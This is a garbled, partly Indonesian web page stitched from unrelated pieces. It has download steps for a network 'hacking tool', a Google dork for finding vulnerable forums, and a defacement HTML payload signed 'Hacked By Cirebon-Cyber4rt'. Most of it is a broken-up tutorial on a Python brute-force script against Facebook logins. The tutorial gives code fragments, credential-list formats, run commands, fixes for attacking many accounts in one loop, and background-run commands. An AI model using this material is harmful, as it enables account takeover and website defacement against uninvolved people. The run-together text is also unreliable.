Cara menggunakannya:
1.Download aplikasinya di sini
2.ekstrak file winrarnya
3.jalankan aplikasinya
4.Pilih Jaringannya
5.Pilih metode penyerangannya
6.Pilih deskripsi jaringannya dan hubungkan
7.Enjoyy
Download hacking Tools Anonymous
Free Download and Sharing




inurl:/forums.asp?iFor=
<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 1350px; border-bottom: black 1px; position: absolute; top: 0px; height: 698px; background-color: black; layer-background-color: black"><center> <br><b><font face="papyrus" color="red" size="5">Hacked By Cirebon-Cyber4rt</font></h2><br><br><img src="http://i1121.photobucket.com/albums/l513/iqbalkanci/images8.jpg"><br><br> <font face="papyrus" color="green" size="4">Thanks To: Hacker Newbie Community | YogyaCarderLink | DevilzCode | Indonesian BlackHat | etc</a><br> <br><font color="red" size="3">Wkwkwkwk </div>
$ python -v$ python --version$ easy_install Mechanizepassword1password2password3password4
$ python original-fbbruteforce.py -u test@yahoo.com -w pass.txt
Username (-u) argument value inputted from the terminal.def bruteforce(word): try: #sys.stdout.write("\r[*] Trying %s... " % word) pos = word.find("::") username = word[0:pos] word = word[pos+len("::"):len(word)]$ python original-fbbruteforce.py -w pass.txttest@yahoo.com::password1test@yahoo.com::password2test@yahoo.com::password3test@yahoo.com::password4Username/UserEmail” and second will be the “Password“.
$ python original-fbbruteforce.py -w pass.txttest@yahoo.com::password1test@yahoo.com::password2michaelantonio777@yahoo.com::MyP4sSw0rDtest@yahoo.com::password3test@yahoo.com::password4
Username: michaelantonio777@yahoo.com and password: MyP4sSw0rD, it should logging in successfully, but it didn’t.Facebook security checkpoint page” or the password being submitted is an old password.cookielib.LWPCookieJar()
class in Python. It’s intended to save the cookies captured from
opening website URL link. So, once the script successfully logging in a
certain account, then the cookielib class will save the cookies &
session data of that account. if success in response: print "\n\n[*] Logging in success..." print "[*] Username : %s" % (username) print "[*] Password : %s\n" % (word) file.write("\n[*] Logging in success...") file.write("\n[*] Username : %s" % (username)) file.write("\n[*] Password : %s\n\n" % (word)) sys.exit(1)sys.exit(1)” line, means it will terminate the looping process. To avoid being terminated, this line should be removed.sys.exit()” line, still the cookies & session saved for the next POST submit. And ofcourse, there will raise a problem. What is it? Look at this line: opensite = br.open(fblogin) br.select_form(nr=0) br.form['email'] = username br.form['pass'] = word br.submit()br.select_form(nr=0)” trying to find and select for “Login Form”
for the next POST submit, but since there’s a “successful login
cookies” saved from the previous process, ofcourse it will raise error
message that the “Form is not found” generated by this exception line: except mechanize._mechanize.FormNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1)Login Form” or not. Ofcourse you would’t find it, because you are already logged in.CookieJar.clear_session_cookies()”
to clear all the cookies and session. But, this is not recommended,
because even it clears all the cookies and sessions, it is similar to
“closing” the “simulate browser”, means closing/terminate the script
also. So, this would not solve the problem.Log Out” form and submit it.
This will simulate for logging out process, and clear the cookies and
session. And the script will continue the bruteforce looping and get the
“Log In” form to submit for the next account.Facebook security checkpoint” page and “submitted password is an old password” page or the login attempts encounter error for several times. except mechanize._form.ControlNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1)Control Not Found“? It means that the script could not find for the “Email”
field Control in the Login Form. Why? Because there has already an
auto-filled/auto-complete for the Email account, and the form element
doesn’t contain it (for the next POST SUBMIT).Email” field by simulating a “click” or submit to link which contains string like “notme.php“. By forcing to click this “Not Me” link, it will then load for the Facebook login page and the script can find for the “Email” and “password” Control field successfully."https://login.facebook.com/login.php?login_attempt=1"test@yahoo.com::password1test@yahoo.com::password2michaelantonio777@yahoo.com::MyP4sSw0rDtest@yahoo.com::password3test@yahoo.com::password4$ python fixed-fbbruteforce.py -w pass.txt
Log Out” click simulation works. File pass.txt contains:test@yahoo.com::password1test@yahoo.com::password2michaelantonio777@yahoo.com::MyP4sSw0rDjuliawoods880@yahoo.com::Th3P4s5W0rdtest@yahoo.com::password3test@yahoo.com::password4$ python fixed-fbbruteforce.py -w pass.txt
$ python fixed-fbbruteforce.py -w pass.txt

security checkpoint page“, “the password is an old password“, “Not Me Trapped“, etc. But, as you run this script many times with different accounts to bruteforce, you will find out by yourself.userEmail::passwordhttps://www.facebook.com/michael.antoniomichael.antonio” is the UserName.$ nohup nice -n 3 python2.7 fixed-fbbruteforce.py -w pass.txt 1>/[dir]/logs.txt &$ nohup nice -n 3 python fixed-fbbruteforce.py -w pass.txt 1>/[dir]/logs.txt &